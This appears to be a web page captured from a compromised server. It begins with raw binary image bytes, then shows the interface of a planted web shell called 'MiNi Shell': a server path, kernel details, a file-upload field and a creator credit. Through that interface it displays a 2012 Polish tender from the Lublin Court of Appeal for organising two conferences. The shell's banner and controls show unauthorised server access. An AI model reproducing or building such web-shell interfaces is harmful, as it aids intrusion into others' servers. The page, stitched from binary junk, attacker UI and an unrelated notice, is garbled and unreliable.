JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120625/219336-N-2012.html

<p class="kh_header"><b>Lublin: Obsługa i organizacja 2 konferencji</b><br>
<b>Numer ogłoszenia: 219336 - 2012; data zamieszczenia: 25.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Apelacyjny w Lublinie , ul. Obrońców Pokoju 1, 20-950 Lublin, woj. lubelskie, tel. 081 5348782, faks 081 5348782.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lublin.sa.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa i organizacja 2 konferencji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest organizacja i obsługa 2 konferencji, jednej konferencji organizowanej dla służb finansowych z sądów powszechnych apelacji lubelskiej oraz drugiej konferencji organizowanej dla sędziów z sądów powszechnych apelacji lubelskiej.
2) Przedmiot zamówienia został podzielony na 2 następujące części i szczegółowo opisany w załącznikach nr 1 i 2 do SIWZ:
I CZĘŚĆ - organizacja i obsługa konferencji służb finansowych z sądów powszechnych apelacji lubelskiej w terminie 17-19 września 2012 r. w liczbie 68 osób - załącznik nr 1 do SIWZ.
II CZĘŚĆ - organizacja i obsługa konferencji sędziów z sądów powszechnych apelacji lubelskiej w terminie 1-3 października 2012 r. w liczbie 90 osób - załącznik nr 2 do SIWZ.
3) Istotne dla stron postanowienia, zawarte są we wzorze umowy stanowiącym załączniki nr 6 i 7 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.00.00.00-0, 55.12.00.00-7, 55.30.00.00-3, 55.31.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>A. DLA CZĘŚCI I:
Zamawiający wymaga, wykazania przez Wykonawcę, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, (a jeśli okres działalności jest krótszy - w tym okresie), została wykonana co najmniej jedna usługa w zakresie organizacji i obsługi konferencji o wartości co najmniej 15 000 zł brutto i uczestników konferencji w liczbie co najmniej 30 osób. Przez organizację i obsługę konferencji, rozumie się organizację konferencji poprzez zapewnienie usług hotelarskich i restauracyjnych wraz z udostępnieniem sali konferencyjnej (sal konferencyjnych) oraz czynny udział w obsłudze konferencji podczas jej trwania dla ww. liczby osób. 
Warunek ten zostanie spełniony poprzez złożenie przez Wykonawcę wykazu usług podobnych (w załączeniu wzór formularza do ewentualnego wykorzystania - załącznik nr 5A do SIWZ) informujący, że zrealizował co najmniej jedną usługę w zakresie organizacji i obsługi konferencji, w tym świadczenie usług o wartości 
co najmniej 15 000 złotych brutto i uczestników konferencji w liczbie co najmniej 30 osób. W przypadku składania oferty wspólnej, Wykonawcy składający ofertę wspólną składają jeden wspólny wykaz usług. Wraz z wykazem należy złożyć dokument potwierdzający, że usługa w zakresie organizacji i obsługi konferencji została wykonana należycie (np. referencje itp.).
B. DLA CZĘŚCI II: 
Zamawiający wymaga, wykazania przez Wykonawcę, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, (a jeśli okres działalności jest krótszy - w tym okresie), została wykonana co najmniej jedna usługa w zakresie organizacji i obsługi konferencji o wartości co najmniej 50 000 zł brutto i uczestników konferencji w liczbie co najmniej 70 osób. Przez organizację i obsługę konferencji, rozumie się organizację konferencji poprzez zapewnienie usług hotelarskich i restauracyjnych wraz z udostępnieniem sali konferencyjnej (sal konferencyjnych) oraz czynny udział w obsłudze konferencji podczas jej trwania dla ww. liczby osób..
Warunek ten zostanie spełniony poprzez złożenie przez Wykonawcę wykazu usług podobnych (w załączeniu wzór formularza do ewentualnego wykorzystania - załącznik nr 5B do SIWZ) informujący, że zrealizował co najmniej jedną usługę w zakresie organizacji i obsługi konferencji o wartości co najmniej 50 000 złotych brutto i uczestników konferencji w liczbie co najmniej 70 osób. W przypadku składania oferty wspólnej, Wykonawcy składający ofertę wspólną składają jeden wspólny wykaz usług. Wraz z wykazem należy złożyć dokument potwierdzający, że usługa w zakresie organizacji i obsługi konferencji została wykonana należycie (np. referencje itp.).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>A. DLA CZĘŚCI I: 
Zamawiający wymaga, wykazania przez Wykonawcę, że: 
I. dysponuje w ramach tego samego obiektu hotelowego co najmniej: 
a) 8 pokojami hotelowymi do jednoosobowego wykorzystania z pełnym węzłem sanitarnym;
b) 30 pokojami hotelowymi do dwuosobowego wykorzystania z pełnym węzłem sanitarnym;
c) 2 salami konferencyjnymi, w tym jedna na 68 osób i druga na min. 20 osób, 
d) 12 miejscami parkingowymi;
II. oraz, że obiekt: 
a) położony w promieniu 120 km od Lublina, w miejscowości powyżej 3 tys. mieszkańców do 100 tys. mieszkańców,
b) zapewnia standard nie niższy niż hotele zaszeregowane w kategorii  trzygwiazdkowej, zgodnie z rozporządzeniem Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 roku w sprawie obiektów hotelarskich i innych obiektów, w których świadczone są usługi hotelarskie (tj. Dz. U. z 2006 r., Nr 22, poz. 169 z późn.zm.).
B. DLA CZĘŚCI II: 
Zamawiający wymaga, wykazania przez Wykonawcę, że: 
I. dysponuje w ramach tego samego obiektu hotelowego co najmniej: 
a) 16 pokojami hotelowymi do jednoosobowego wykorzystania z pełnym węzłem sanitarnym;
b) 37 pokojami hotelowymi do dwuosobowego wykorzystania z pełnym węzłem sanitarnym;
c) 3 salami konferencyjnymi, w tym dwie dla 30 osób i jedna dla 60 osób;
d) 20 miejscami parkingowymi; 
II. oraz, że obiekt:
a) położony w województwie lubelskim w miejscowości powyżej 3 tys. mieszkańców do 100 tys. mieszkańców,
b) zapewnia standard nie niższy niż hotele zaszeregowane w kategorii  trzygwiazdkowej, zgodnie z rozporządzeniem Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 roku w sprawie obiektów hotelarskich i innych obiektów, w których świadczone są usługi hotelarskie (tj. Dz. U. z 2006 r., Nr 22, poz. 169 z późn.zm.).
Warunek ten zostanie spełniony poprzez złożenie przez Wykonawcę oświadczenia (w załączeniu wzór formularza do ewentualnego wykorzystania - załącznik nr 5C do SIWZ) zawierający wykaz pokoi, sali konferencyjnych i zaplecza postojowego, a także odpowiednich oświadczeń Wykonawcy w zakresie wskazanym w pkt I lit a) i b) lub pkt II lit a) i b).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lublin.sa.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Apelacyjny w Lublinie
ul. Obrońców Pokoju nr 1
20-950 Lublin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.07.2012 godzina 08:30, miejsce: Oferty należy składać w Biurze Podawczym prowadzonym przez Oddział Administracyjny Sądu Apelacyjnego w Lublinie przy ul. Obrońców Pokoju 1, 20 - 950 Lublin..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja i obsługa konferencji służb finansowych z sądów powszechnych apelacji lubelskiej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest świadczenie usługi w zakresie organizacji i obsługi konferencji dla służb finansowych  z sądów powszechnych apelacji lubelskiej, w liczbie 68 osób, w okresie trzech dni od 17 września 2012 r. do 19 września 2012 r., z zastrzeżeniem, że Zamawiający może zmniejszyć liczbę uczestników konferencji maksymalnie o 10 osób poprzez podanie jej liczy 
w terminie do dwóch dni przed rozpoczęciem konferencji.
II. Przez organizację i obsługę konferencji, rozumie się organizację konferencji poprzez zapewnienie usług hotelarskich i restauracyjnych wraz z udostępnieniem sal konferencyjnych oraz czynny udział w obsłudze konferencji podczas jej trwania dla ww. liczby osób, itp. na zasadach określonych w pkt I do V niniejszego Załącznika do SIWZ. 
III. Miejsce realizacji usług: hotel położony w promieniu 120 km od Lublina, w miejscowości powyżej 3 tys. mieszkańców do 100 tys. mieszkańców i zapewniający standard nie niższy niż hotele zaszeregowane w kategorii  trzygwiazdkowej, zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 roku w sprawie obiektów hotelarskich i innych obiektów, w których świadczone są usługi hotelarskie (tj. Dz. U. z 2006 r., Nr 22, poz. 169 z późn.zm.).
IV. Zakres usługi:
1. Pokoje hotelowe dla uczestników szkolenia:
Wykonawca zapewnia zakwaterowanie dla 68 osób w pokojach 1, 2, - osobowych z tym, że Zamawiający wymaga, aby Wykonawca udostępnił: 
a) 8 pokoi do 1-osobowego wykorzystania, 
b) 30 pokoi do 2-osobowego wykorzystania. 
Pokoje powinny być wyposażone co najmniej w:  pojedyncze miejsca do spania (łoża małżeńskie będą wykorzystane jednoosobowo), szafę ubraniową, łazienkę z wanną lub kabiną natryskową, umywalkę, lustro, WC. Wykluczone są dostawki w pokojach.
2. Sala konferencyjna z wyposażeniem:
Sale konferencyjno - szkoleniowe będą znajdować się w hotelu, w którym zakwaterowani będą uczestnicy szkolenia. Wykonawca zapewnia: 
a) w dniu 17.09.2012 r. jedną salę  konferencyjną dla 68 osób, 
b) w dniach 18 i 19 września 2012 r. - dwie sale konferencyjno-szkoleniowe, z tym, że jedna dla 20 osób, zaś druga dla 48 osób. 
Sale powinny być dostosowane do potrzeb przeprowadzenia zajęć w formie wykładu, odpowiednio oświetlone oraz wyposażone w: klimatyzację, ekran lub białą ścianę do projekcji, rzutnik multimedialny, Internet, tablicę, gąbkę oraz flamastry do tablicy, krzesła, stoliki, nagłośnienie. 
3. Zaplecze gastronomiczne (kuchnia i sala restauracyjna będą znajdować się w hotelu, w którym zakwaterowani będą uczestnicy szkolenia)  i wyżywienie.
4. Czynny udział w organizacji i obsłudze konferencji podczas jej trwania
1) Wykonawca odda do dyspozycji Zamawiającego osobę odpowiedzialną za organizację i obsługę konferencji. 
6. Miejsca parkingowe znajdujące się na terenie hotelu: dla minimum 12 samochodów. 
7. Ewentualna opłata klimatyczna musi być uwzględniona w całościowej opłacie za usługę. Wykonawca nie może żądać wniesienia opłaty klimatycznej bezpośrednio od uczestników konferencji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.00.00.00-0, 55.12.00.00-7, 55.30.00.00-3, 55.31.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Organizacja i obsługa konferencji sędziów z sądów powszechnych apelacji lubelskiej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest świadczenie usługi w zakresie organizacji i obsługi konferencji dla 90 sędziów orzekających w wydziałach rodzinnych, pracy i ubezpieczeń społecznych w sądach powszechnych apelacji lubelskiej w okresie trzech dni, tj. od  1 października 2012  r. do 3 października 2012 r., z zastrzeżeniem, że Zamawiający może zmniejszyć liczbę uczestników konferencji maksymalnie o 10 osób poprzez podanie jej liczy w terminie do dwóch dni przed rozpoczęciem konferencji.
II. Przez organizację i obsługę konferencji, rozumie się organizację konferencji poprzez zapewnienie usług hotelarskich i restauracyjnych wraz z udostępnieniem sal konferencyjnych oraz czynny udział w obsłudze konferencji podczas jej trwania dla ww. liczby osób, itp. na zasadach określonych w pkt I do V niniejszego Załącznika do SIWZ. 
III. Miejsce realizacji usług: hotel położony w województwie lubelskim w miejscowości powyżej 3 tys. mieszkańców do 100 tys. mieszkańców i zapewniający standard nie niższy niż hotele zaszeregowane w kategorii  trzygwiazdkowej, zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 roku w sprawie obiektów hotelarskich i innych obiektów, w których świadczone są usługi hotelarskie (tj. Dz. U. z 2006 r. Nr 22 poz. 169).
IV. Zakres usługi:
1. Pokoje hotelowe dla uczestników konferencji:
Wykonawca zapewnia zakwaterowanie dla 90 osób w pokojach 1, 2,  - osobowych z tym, że Zamawiający wymaga, aby Wykonawca udostępnił: 
a)  16 pokoi do 1-osobowego wykorzystania, 
b) 37 pokoi do 2-osobowego wykorzystania. 
Pokoje powinny być wyposażone co najmniej w:  pojedyncze miejsca do spania (łoża małżeńskie będą wykorzystane jednoosobowo), szafę ubraniową, łazienkę z wanną lub kabiną natryskową, umywalkę, lustro, WC. Wykluczone są dostawki w pokojach. Pokoje winny znajdować się w obrębie jednego budynku hotelowego.
2. Sale konferencyjne z wyposażeniem:
Sale konferencyjno-szkoleniowe będą znajdować się w hotelu, w których zakwaterowani będą uczestnicy szkolenia. Wykonawca zapewnia:
a) w dniach 1 i 2 października 2012 r. - 2 sale konferencyjno-szkoleniowe dla 60 i 30 osób,
b) w dniu 3 października 2012 r. - 3 sale konferencyjno-szkoleniowe, każda dla 30 osób.
Powinny być one dostosowane do potrzeb przeprowadzenia zajęć w formie wykładu, odpowiednio oświetlone  oraz wyposażone w: nagłośnienie, klimatyzację, ekran lub białą ścianę do projekcji, rzutnik multimedialny, Internet, tablicę, gąbkę oraz flamastry do tablicy, stoliki, krzesła. 
3. Zaplecze gastronomiczne (kuchnia i sala restauracyjna będą znajdować się w hotelu, w którym zakwaterowani będą uczestnicy szkolenia)  i wyżywienie:
4. Czynny udział w organizacji i obsłudze konferencji podczas jej trwania
1) Wykonawca odda do dyspozycji Zamawiającego osobę odpowiedzialną za organizację i obsługę konferencji. 
6. Miejsca parkingowe znajdujące się na terenie hotelu:  dla minimum 20 samochodów osobowych.
7. Ewentualna opłata klimatyczna musi być uwzględniona w całościowej opłacie za usługę. Wykonawca nie może żądać wniesienia opłaty klimatycznej bezpośrednio od uczestników konferencji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.00.00.00-0, 55.12.00.00-7, 55.30.00.00-3, 55.31.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com